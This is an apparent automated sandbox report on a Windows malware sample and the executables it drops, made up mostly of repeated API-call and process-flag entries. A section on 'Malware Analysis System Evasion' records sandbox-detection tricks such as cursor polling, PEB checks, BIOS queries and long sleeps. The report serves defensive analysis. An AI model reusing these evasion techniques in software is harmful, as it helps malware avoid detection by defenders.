Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Code function: 11_2_00423C1C IsIconic,PostMessageA,PostMessageA,PostMessageA,SendMessageA,IsWindowEnabled,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus, 11_2_00423C1C
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Code function: 11_2_004241EC IsIconic,SetActiveWindow,SetFocus, 11_2_004241EC
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Code function: 11_2_004241A4 IsIconic,SetActiveWindow, 11_2_004241A4
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Code function: 11_2_00418394 IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient, 11_2_00418394
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Code function: 11_2_0042286C SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow, 11_2_0042286C
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Code function: 11_2_004833BC IsIconic,GetWindowLongA,ShowWindow,ShowWindow, 11_2_004833BC
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Code function: 11_2_004175A8 IsIconic,GetCapture, 11_2_004175A8
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Code function: 11_2_00417CDE IsIconic,SetWindowPos, 11_2_00417CDE
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Code function: 11_2_00417CE0 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement, 11_2_00417CE0
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Code function: 11_2_0041F128 GetVersion,SetErrorMode,LoadLibraryA,SetErrorMode,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary, 11_2_0041F128
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\G__XJZ9ACVwRjgVn6BXId6E1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\G__XJZ9ACVwRjgVn6BXId6E1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\hI6pMK6rYY2urO_lpGyU85DA.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\Jrh6BLxH1aqS3cJle2sY_F2Q.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\Jrh6BLxH1aqS3cJle2sY_F2Q.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\Jrh6BLxH1aqS3cJle2sY_F2Q.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\Jrh6BLxH1aqS3cJle2sY_F2Q.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\Jrh6BLxH1aqS3cJle2sY_F2Q.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\Jrh6BLxH1aqS3cJle2sY_F2Q.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\Jrh6BLxH1aqS3cJle2sY_F2Q.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\Jrh6BLxH1aqS3cJle2sY_F2Q.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\Jrh6BLxH1aqS3cJle2sY_F2Q.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\Jrh6BLxH1aqS3cJle2sY_F2Q.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\Ifh3vuF2SF2LvHombSP7ZGRi.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS1DF8.tmp\Install.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS1DF8.tmp\Install.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS1DF8.tmp\Install.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS1DF8.tmp\Install.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS1DF8.tmp\Install.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS1DF8.tmp\Install.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7zS2897.tmp\Install.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Sandbox detection routine: GetCursorPos, DecisionNode, Sleep
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Evasive API call chain: GetPEB, DecisionNodes, Sleep
Source: C:\Users\user\Desktop\file.exe Memory allocated: 1630000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\file.exe Memory allocated: 3020000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\file.exe Memory allocated: 5020000 memory reserve | memory write watch
Source: C:\Users\user\Documents\iofolko5\G__XJZ9ACVwRjgVn6BXId6E1.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\Local\Temp\7zS2897.tmp\Install.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: GetCursorPos,GetCursorPos,Sleep,GetCursorPos,__aulldiv,Sleep, 3_2_00432FE0
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1186
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 651
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-8OGEE.tmp\_isetup\_RegDLL.tmp
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Play Glock\uninstall\is-R79QI.tmp
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Play Glock\is-75FQC.tmp
Source: C:\Users\user\Documents\iofolko5\G__XJZ9ACVwRjgVn6BXId6E1.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\IZImiIFXXrvtVOHFozZW.dll
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-8OGEE.tmp\_isetup\_setup64.tmp
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Play Glock\is-O04L0.tmp
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Play Glock\is-IKU3H.tmp
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Play Glock\libeay32.dll (copy)
Source: C:\Users\user\Documents\iofolko5\G__XJZ9ACVwRjgVn6BXId6E1.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\service123.exe
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-8OGEE.tmp\_isetup\_shfoldr.dll
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Play Glock\ssleay32.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-8OGEE.tmp\_isetup\_iscrypt.dll
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Play Glock\msvcp71.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Play Glock\msvcr71.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Play Glock\uninstall\unins000.exe (copy)
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Play Glock\Qt5OpenGL.dll (copy)
